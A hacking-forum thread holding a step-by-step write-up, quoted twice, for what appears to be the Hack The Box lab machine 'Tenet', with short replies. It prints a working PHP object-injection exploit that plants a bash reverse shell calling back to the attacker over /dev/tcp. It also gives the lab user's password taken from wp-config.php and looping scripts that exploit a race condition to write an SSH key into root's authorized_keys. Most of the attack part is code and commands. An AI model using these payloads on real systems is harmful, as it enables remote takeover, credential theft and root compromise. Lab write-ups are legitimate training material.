FLAG Tenet Writeup FREE
by dory23 - January 17, 2021 at 08:40 PM
#1
1. while checking tenet.htb we can see the comment of neil that there is a backup called sator
2. add sator.tenet.htb in /etc/hosts
3. remembering there is a sator.php.bak inside of sator.tenet.htb we can access it using sator.tenet.htb/sator.php.bak
4. while checking the code it was a PHP Object injection so it is a deserialization
  - Check this https://medium.com/swlh/exploiting-php-d...d71f03282a and https://www.exploit-db.com/docs/english/...bility.pdf
we will just edit the code
from this


<?php

class DatabaseExport
{
        public $user_file = 'users.txt';
        public $data = '';

        public function update_db()
        {
                echo '[+] Grabbing users from text file <br>';
                $this-> data = 'Success';
        }


        public function __destruct()
        {
                file_put_contents(__DIR__ . '/' . $this ->user_file, $this->data);
                echo '[] Database updated <br>';
        //      echo 'Gotta get this working properly...';
        }
}

$input = $_GET['arepo'] ?? '';
$databaseupdate = unserialize($input);

$app = new DatabaseExport;
$app -> update_db();


?>

to This



<?php
class DatabaseExport
{
        public $user_file = 'test.php';
    public $data = '<?php exec("/bin/bash -c \'bash -i > /dev/tcp/ip/5555 0>&1\'"); ?>';

        public function __destruct()
        {
                file_put_contents(__DIR__ . '/' . $this ->user_file, $this->data);
                echo '[] Database updated';
        }
}

$url = 'http://10.10.10.223/sator.php?arepo=' . urlencode(serialize(new DatabaseExport));
$response = file_get_contents("$url");
$response = file_get_contents("http://10.10.10.223/test.php");

?>

5. then we will get a reverse shell on port 5555
6. after getting a reverse shell check wordpress/wp-config.php there is the credentials of neil

neil
Opera2113

7. ssh into the user neil to get the user.txt
8. sudo -l we can see /usr/local/bin/enableSSH.sh is runnable as root
9. by checking the code we can see there is a race condition there
<snipped>
addKey() {

        tmpName=$(mktemp -u /tmp/ssh-XXXXXXXX)

        (umask 110; touch $tmpName)

        /bin/echo $key >>$tmpName

        checkFile $tmpName

        /bin/cat $tmpName >>/root/.ssh/authorized_keys

        /bin/rm $tmpName

}


10. we should generate a id_rsa using ssh-keygen -t rsa
11. then on the 10.10.10.223 machine create a add_rsa.sh

while true
do
echo "ssh-rsa key" | tee /tmp/ssh-*
done

12. then create a script to run the enableSSH.sh  and name it 1.sh

while true
do
sudo /usr/local/bin/enableSSH.sh
done


13. chmod 600 id_rsa , then after a few minutes or seconds ssh into root
14. ssh -i id_rsa [email protected]


if you liked the writeup give rep up and 
DONATIONS ONLY NO CONTENT INSIDE Hidden Content
You must register or login to view this content.
Reply
#2
Thank you i just finished this one!
Reply
#3
USER

ssh [email protected]

Passwd: Opera2112

(January 17, 2021 at 08:40 PM)dory23 Wrote: 1. while checking tenet.htb we can see the comment of neil that there is a backup called sator
2. add sator.tenet.htb in /etc/hosts
3. remembering there is a sator.php.bak inside of sator.tenet.htb we can access it using sator.tenet.htb/sator.php.bak
4. while checking the code it was a PHP Object injection so it is a deserialization
  - Check this https://medium.com/swlh/exploiting-php-d...d71f03282a and https://www.exploit-db.com/docs/english/...bility.pdf
we will just edit the code
from this


<?php

class DatabaseExport
{
        public $user_file = 'users.txt';
        public $data = '';

        public function update_db()
        {
                echo '[+] Grabbing users from text file <br>';
                $this-> data = 'Success';
        }


        public function __destruct()
        {
                file_put_contents(__DIR__ . '/' . $this ->user_file, $this->data);
                echo '[] Database updated <br>';
        //      echo 'Gotta get this working properly...';
        }
}

$input = $_GET['arepo'] ?? '';
$databaseupdate = unserialize($input);

$app = new DatabaseExport;
$app -> update_db();


?>

to This



<?php
class DatabaseExport
{
        public $user_file = 'test.php';
    public $data = '<?php exec("/bin/bash -c \'bash -i > /dev/tcp/ip/5555 0>&1\'"); ?>';

        public function __destruct()
        {
                file_put_contents(__DIR__ . '/' . $this ->user_file, $this->data);
                echo '[] Database updated';
        }
}

$url = 'http://10.10.10.223/sator.php?arepo=' . urlencode(serialize(new DatabaseExport));
$response = file_get_contents("$url");
$response = file_get_contents("http://10.10.10.223/test.php");

?>

5. then we will get a reverse shell on port 5555
6. after getting a reverse shell check wordpress/wp-config.php there is the credentials of neil

neil
Opera2113

7. ssh into the user neil to get the user.txt
8. sudo -l we can see /usr/local/bin/enableSSH.sh is runnable as root
9. by checking the code we can see there is a race condition there
<snipped>
addKey() {

        tmpName=$(mktemp -u /tmp/ssh-XXXXXXXX)

        (umask 110; touch $tmpName)

        /bin/echo $key >>$tmpName

        checkFile $tmpName

        /bin/cat $tmpName >>/root/.ssh/authorized_keys

        /bin/rm $tmpName

}


10. we should generate a id_rsa using ssh-keygen -t rsa
11. then on the 10.10.10.223 machine create a add_rsa.sh

while true
do
echo "ssh-rsa key" | tee /tmp/ssh-*
done

12. then create a script to run the enableSSH.sh  and name it 1.sh

while true
do
sudo /usr/local/bin/enableSSH.sh
done


13. chmod 600 id_rsa , then after a few minutes or seconds ssh into root
14. ssh -i id_rsa [email protected]


if you liked the writeup give rep up and 
[Hidden Content]

Thank you bro you doing great
Reply
#4
Bumpgng to the first page
Reply
#5
How can I *change* the php code on the server? Is there some upload method?
Reply
#6
(February 03, 2021 at 08:37 PM)b1tl0rd Wrote: How can I *change* the php code on the server? Is there some upload method?

run it from your side using php
Reply
#7
You wrote the wrong passwort for neil its not Opera2113 its Opera2112
Reply

Possibly Related Threads…
Thread Author Replies Views Last Post
TUTORIAL HTB Tenet SyLZ 19 4,068 Today at 03:54 AM
Last Post: mimami
TUTORIAL crossfit insane box free writeup jenna_js 1 537 February 22, 2021 at 11:59 PM
Last Post: dannydennson
SELLING Tenet user and root flag tetestcomp126 1 205 February 19, 2021 at 08:22 PM
Last Post: John Doe

 Users browsing this thread: 1 Guest(s)